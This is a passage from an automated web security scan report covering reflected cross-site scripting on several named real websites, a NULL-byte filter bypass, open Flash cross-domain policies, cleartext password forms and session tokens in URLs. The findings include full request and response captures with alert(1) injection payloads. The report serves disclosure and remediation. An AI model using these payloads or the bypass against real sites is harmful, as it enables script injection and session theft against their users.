GET /service/restv1/most-popular/daily/most_hbr/10/mostResphdlra97fd%253cscript%253ealert%25281%2529%253c%252fscript%253e7555d97a7c3 ?_=1320847772502 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:10:53 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 Content-Type: text/plain; charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:10:53 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 1507 mostResphdlra97fd<script>alert(1)</script>7555d97a7c3 ([{"pageUrl":"http://blogs.hbr.org/schwartz/2011/11/four-destructive-myths-most-co.html","pageTitle":"Four Destructive Myths Most Companies Still Live By - Tony Schwartz - Harvard Business Review","pag...[SNIP]...
2.9. http://ox-d.hbr.org/w/1.0/ajs [o parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ox-d.hbr.org
Path:
/w/1.0/ajs
Issue detail
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d393"%3balert(1)//124823b8681 was submitted in the o parameter. This input was echoed as 4d393";alert(1)//124823b8681 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /w/1.0/ajs?o=96060324194d393"%3balert(1)//124823b8681 &pgid=3803&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=UTF-8&tz=360&url=http%3A//hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG%3FNtt%3DVenture+Capital+process%26Nao%3D10&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cb=9606032419 HTTP/1.1 Host: ox-d.hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OK Set-Cookie: OX_u=3c8ff8e6-e6f1-0947-387a-387c4d19df37_m; Version=1; Expires=Thu, 08 Nov 2012 14:09:45 GMT; Max-Age=31536000; Path=/ Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic) Pragma: no-cache P3P: CP="CUR ADM OUR NOR STA NID" Expires: Mon, 26 Jul 1997 05:00:00 GMT Date: Wed, 09 Nov 2011 14:09:45 GMT Content-Type: text/javascript Content-Length: 7272 Cache-Control: private, max-age=0, no-cache Connection: close (function(){ OX.addCreative("96060324194d393";alert(1)//124823b8681 ","36877","<div id='beacon_48689577' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://ox-d.hbr....[SNIP]...
2.10. http://ox-d.hbr.org/w/1.0/ajs [o parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ox-d.hbr.org
Path:
/w/1.0/ajs
Issue detail
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9441"%3balert(1)//1000138ce0c was submitted in the o parameter. This input was echoed as e9441";alert(1)//1000138ce0c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /w/1.0/ajs?cc=1&o=9606032419e9441"%3balert(1)//1000138ce0c &pgid=3803&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=UTF-8&tz=360&url=http%3A//hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG%3FNtt%3DVenture+Capital+process%26Nao%3D10&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cb=9606032419 HTTP/1.1 Host: ox-d.hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; OX_u=c5d0cc11-c3a1-02f2-2f7e-104ff35dd0d5_a_1320847766
Response
HTTP/1.1 200 OK Set-Cookie: OX_u=3c8ff8e6-e6f1-0947-387a-387c4d19df37_m; Version=1; Expires=Thu, 08 Nov 2012 14:09:39 GMT; Max-Age=31536000; Path=/ Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic) Pragma: no-cache P3P: CP="CUR ADM OUR NOR STA NID" Expires: Mon, 26 Jul 1997 05:00:00 GMT Date: Wed, 09 Nov 2011 14:09:39 GMT Content-Type: text/javascript Content-Length: 3602 Cache-Control: private, max-age=0, no-cache Connection: close (function(){ OX.addCreative("9606032419e9441";alert(1)//1000138ce0c ","36877","<div id='beacon_93853794' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://ox-d.hbr....[SNIP]...
2.11. http://www.magnify.net/media/site/P8TH6404Q1P6NBW1/local_style.css [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.magnify.net
Path:
/media/site/P8TH6404Q1P6NBW1/local_style.css
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ec2"><script>alert(1)</script>ca3da81d034 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media29ec2"><script>alert(1)</script>ca3da81d034 /site/P8TH6404Q1P6NBW1/local_style.css?1320843924 HTTP/1.1 Host: www.magnify.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://content.usv.com/pages/canvas
Response
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=3bd3f0f19cc2dfcdb06b05799092866d; path=/; expires=Thu, 10-Nov-2011 13:20:51 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 9421 Date: Wed, 09 Nov 2011 13:20:51 GMT X-Varnish: 1394908944 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://www.magnify.net/media29ec2"><script>alert(1)</script>ca3da81d034 /site/P8TH6404Q1P6NBW1/local_style.css%0AServer: www.magnify.net%0APath: /media29ec2">...[SNIP]...
2.12. http://www.mongodb.org/json/contentnamesearch.action [query parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/json/contentnamesearch.action
Issue detail
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload bc92f<img%20src%3da%20onerror%3dalert(1)>204bb8686be was submitted in the query parameter. This input was echoed as bc92f<img src=a onerror=alert(1)>204bb8686be in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /json/contentnamesearch.action?query=sqbc92f<img%20src%3da%20onerror%3dalert(1)>204bb8686be HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.mongodb.org/display/DOCS/Source+Code Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.4.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:51 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843831088 Vary: User-Agent Content-Type: application/javascript;charset=UTF-8 Content-Length: 442 {"queryTokens":["sqbc92f","img","src","a","onerror","alert","1","204bb8686be"],"contentNameMatches":[[{"icon":null,"spaceName":null,"name":"Search for ‘sqbc92f<img src=a onerror=alert(1)>204bb8686be’","spaceKey":null,"className":"search-for","href":"/dosearchsite.action?queryString=sqbc92f%3Cimg+src%3Da+onerror%3Dalert%281%29%3E204bb8686be"}]],"query":"sqbc92f<img src=a onerror=alert(1)>204bb8686be ","statusMessage":null}
2.13. http://www.mongodb.org/s/1627/3/140/_/styles/combined.css [spaceKey parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/s/1627/3/140/_/styles/combined.css
Issue detail
The value of the spaceKey request parameter is copied into the HTML document as plain text between tags. The payload ee2fc<script>alert(1)</script>34ff8fd4c03 was submitted in the spaceKey parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/1627/3/140/_/styles/combined.css?spaceKey=DOCSee2fc<script>alert(1)</script>34ff8fd4c03 HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/display/DOCS/Home Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/css;charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:28 GMT Expires: Sat, 06 Nov 2021 13:03:28 GMT X-xgen-cache: yes X-Cache-Info: caching Content-Length: 456 @import url('/s/1627/3/1/_/styles/colors.css?spaceKey=DOCSee2fc<script>alert(1)</script>34ff8fd4c03 '); /* Including stylesheet [ name='default-theme.css', location='classpath:/includes/css/default-theme.css' ] */ @import url('/s/1627/3/1/_/download/resources/com.atlassian.confluenc...[SNIP]...
2.14. http://www.sequoiacap.com/us/search/autocomplete [q parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/us/search/autocomplete
Issue detail
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload c7edd<script>alert(1)</script>0a978c926de was submitted in the q parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /us/search/autocomplete?q=earlyc7edd<script>alert(1)</script>0a978c926de HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://www.sequoiacap.com/ideas Cookie: _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.16.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A14%3A31; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07; last_visited_region=2; meebo-cim-session=1805744a324b36a91d9e; __qca=P0-814646353-1320848070265
Response
HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Connection: keep-alive Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 ETag: "101afc31b9dfa0e898ae88b819d25ce3" X-Runtime: 11 Content-Length: 110 Set-Cookie: last_visited_region=2; path=/; expires=Wed, 09-Nov-2011 14:25:27 GMT Cache-Control: private, max-age=0, must-revalidate Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) {"results": [], "q": "earlyc7edd<script>alert(1)</script>0a978c926de ", "region": {"name": "U.S.", "id": "us"}}
2.15. http://www.svangel.com/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.svangel.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47789"><script>alert(1)</script>726ab6f0baf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?47789"><script>alert(1)</script>726ab6f0baf =1 HTTP/1.1 Host: www.svangel.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 09 Nov 2011 13:58:35 GMT Content-type: text/html Content-Length: 250 <html><head><title>SVANGEL.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://about.me/svangel?47789"><script>alert(1)</script>726ab6f0baf =1" name="SVANGEL.COM">...[SNIP]...
2.16. http://www.svangel.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.svangel.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94721"><script>alert(1)</script>1839cabd6c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /94721"><script>alert(1)</script>1839cabd6c7 HTTP/1.1 Host: www.svangel.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 09 Nov 2011 13:58:54 GMT Content-type: text/html Content-Length: 248 <html><head><title>SVANGEL.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://about.me/svangel/94721"><script>alert(1)</script>1839cabd6c7 " name="SVANGEL.COM">...[SNIP]...
3. Flash cross-domain policy
previous
next
There are 2 instances of this issue:
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
3.1. http://www.gravatar.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.gravatar.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.gravatar.com
Response
HTTP/1.1 200 OK Server: nginx Date: Wed, 09 Nov 2011 13:38:35 GMT Content-Type: text/xml Connection: close Content-Length: 261 Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="* " />...[SNIP]...
3.2. http://www.magnify.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.magnify.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.magnify.net
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Last-Modified: Tue, 03 Jun 2008 21:49:53 GMT ETag: "447d71-13a-4845bc81" Content-Type: application/xml X-Magnify-URL-Class: decor Content-Length: 314 Date: Wed, 09 Nov 2011 13:20:24 GMT X-Varnish: 1394907011 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="* " />...[SNIP]...
4. Cleartext submission of password
previous
next
There are 2 instances of this issue:
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
4.1. http://www.codecademy.com/register
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/register
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.codecademy.com/register The form contains the following password fields:user[password] user[password_confirmation]
Request
POST /register HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/register/sign_up Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.10.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc Content-Type: application/x-www-form-urlencoded Content-Length: 174 utf8=%E2%9C%93&authenticity_token=KhTJ2Z6u1ogoRDWZKh1GzcuAPxegEYGLU0BsTXhCzjI%3D&user%5Bemail%5D=xss&user%5Bpassword%5D=xss&user%5Bpassword_confirmation%5D=xss&commit=Sign+up
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:47:11 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "da96b02c6671777cb94c18da763f1f6b" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 Set-Cookie: _session_id=7223ebe20bb6b62e4f99c09916b0aae7; path=/; HttpOnly X-Runtime: 0.129815 Content-Length: 7397 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </h2><form accept-charset="UTF-8" action="/register" class="user_new" id="user_new" method="post"> <div style="margin:0;padding:0;display:inline">...[SNIP]... <span class="field_with_errors"><input id="user_password" name="user[password]" placeholder="Password" size="30" type="password" value="" /> </span>...[SNIP]... <td><input id="user_password_confirmation" name="user[password_confirmation]" placeholder="Password confirmation" size="30" type="password" value="" /> </td>...[SNIP]...
4.2. http://www.codecademy.com/register/sign_up
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/register/sign_up
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.codecademy.com/register The form contains the following password fields:user[password] user[password_confirmation]
Request
GET /register/sign_up HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/courses/jquery-and-the-dom/0 Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.9.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:47:02 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "ea3d8c08b1c8cae71dcc130da39e37c6" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.055047 X-Varnish: 2091622008 Age: 0 Via: 1.1 varnish Content-Length: 7111 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </h2><form accept-charset="UTF-8" action="/register" class="user_new" id="user_new" method="post"> <div style="margin:0;padding:0;display:inline">...[SNIP]... <td><input id="user_password" name="user[password]" placeholder="Password" size="30" type="password" /> </td>...[SNIP]... <td><input id="user_password_confirmation" name="user[password_confirmation]" placeholder="Password confirmation" size="30" type="password" /> </td>...[SNIP]...
5. Session token in URL
previous
next
There are 2 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
5.1. http://www.mongodb.org/display/DOCS/Home
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/display/DOCS/Home
Issue detail
The response contains the following links that appear to contain session tokens:http://www.mongodb.org/spaces/flyingpdf/pdfpageexport.action?pageId=131081&atl_token=3srSe89IIe
Request
GET /display/DOCS/Home HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708
Response
